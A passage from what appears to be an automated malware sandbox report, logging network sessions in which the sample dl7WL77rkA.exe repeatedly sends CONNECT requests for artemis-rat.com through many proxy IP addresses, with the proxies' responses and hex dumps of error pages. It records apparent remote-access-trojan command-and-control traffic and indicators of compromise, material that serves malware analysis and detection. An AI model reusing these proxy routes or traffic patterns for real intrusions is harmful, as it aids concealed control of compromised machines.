                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            311192.168.2.550733208.109.13.93537783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.864516973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.576708078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.607986927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806415081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.933809996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108243942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.311316013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:03.514471054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            312192.168.2.550712222.220.102.15980003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.872649908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.532429934 CET59INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: nginx


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            313192.168.2.550320107.152.98.541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.874901056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            314192.168.2.55076743.155.142.116156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.874914885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            315192.168.2.550888104.16.108.42803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.875190973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.030153036 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            316192.168.2.550760146.59.70.29522763876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.878540039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.576710939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.561100006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.702220917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702126980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.701939106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702217102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.592696905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            317192.168.2.550756103.89.4.16331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.879856110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.592372894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.623595953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.177617073 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            318192.168.2.550133162.240.39.58458403876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.884799004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.995819092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.997227907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            319192.168.2.5507883.9.71.16731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.890944004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.246644974 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            320192.168.2.55076543.255.113.23280803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.902782917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            321192.168.2.55073736.89.10.51442683876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.905483007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            322192.168.2.550892104.16.221.57803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.906733036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.064582109 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            323192.168.2.55088052.13.248.2931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.908911943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.492366076 CET65INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Content-Type: text/plain


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            324192.168.2.550779110.12.211.140803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.919148922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.234119892 CET340INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.12.2
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:34 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Content-Length: 173
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            325192.168.2.55080334.95.243.12280813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.919317007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.576708078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.893650055 CET59INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: nginx


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            326192.168.2.550131198.12.255.19393753876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.919994116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.092413902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.092999935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.201999903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            327192.168.2.551102202.159.30.94433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.923831940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            328192.168.2.551110202.159.30.94433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.925740004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            329192.168.2.551116202.159.30.94433876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.928585052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
